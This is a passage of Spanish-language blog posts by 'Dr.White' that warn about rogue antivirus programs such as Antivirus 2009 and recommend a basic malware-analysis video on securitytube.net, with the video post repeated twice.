- si tienes un buen antivirus y/o Anti-malware, o algun tipo de programa protector que tenga firmas actualizadas pues lo detectará y automaticamente lo eliminará, si el malware ha sido muy bien programado habrá que desinfectar archivo por archivo lo cual resulta un poco dificil ya que tendriamos que hacer seguimiento a los archivos que usa el proceso.

¿Softwares malignos?

- MalwareCore, Antivirus 2009, WinSpywareProtect, WinDefender, etc

¿Recomendación?

- Pues si quieren saber de programas para la eliminación de ciertos virus consulten con gente que sabe ya que pueden correr el riesgo de descargar uno de estos.


Saludos
Dr.White

jueves, 10 de septiembre de 2009

Un Video de Analisis de Malware lo he visto y está muy bueno

Este es un Excelente Video de Analisis de Malware realmente es básico pero sirve mucho, enseña algunas cosillas simples pero que sirven a diario en el analisis de malware, mucha redundancia jaja aquí les va.

http://www.securitytube.net/Simple-Malware-Analyzing-video.aspx


Ahora no he podido poner aquí el video por siertas cosas del javascript pero veanlo de esa web creanme que no se arrepentiran... un pokito largo el video pero vale la pena =)


Saludos
Dr.White

Un Video de Analisis de Malware lo he visto y está muy bueno

Este es un Excelente Video de Analisis de Malware realmente es básico pero sirve mucho, enseña algunas cosillas simples pero que sirven a diario en el analisis de malware, mucha redundancia jaja aquí les va.

http://www.securitytube.net/Simple-Malware-Analyzing-video.aspx


Ahora no he podido poner aquí el video por siertas cosas del javascript pero veanlo de esa web creanme que no se arrepentiran... un pokito largo el video pero vale la pena =)


Saludos
Dr.White